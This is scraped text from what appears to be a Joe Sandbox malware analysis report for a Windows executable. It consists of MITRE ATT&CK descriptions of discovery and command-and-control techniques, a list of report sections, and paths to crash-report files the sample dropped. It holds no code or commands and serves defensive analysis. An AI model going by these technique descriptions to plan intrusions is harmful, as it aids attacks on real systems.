Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report q86onx3LvU.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_q86onx3LvU.exe_735e19e9cc503aa4d8b24e5bfe4db6f9da4f38_290d446c_3a49521a-32b8-4d8e-92a6-47e870a182c5\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D67.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5F3D.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5F8C.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
q86onx3LvU.exe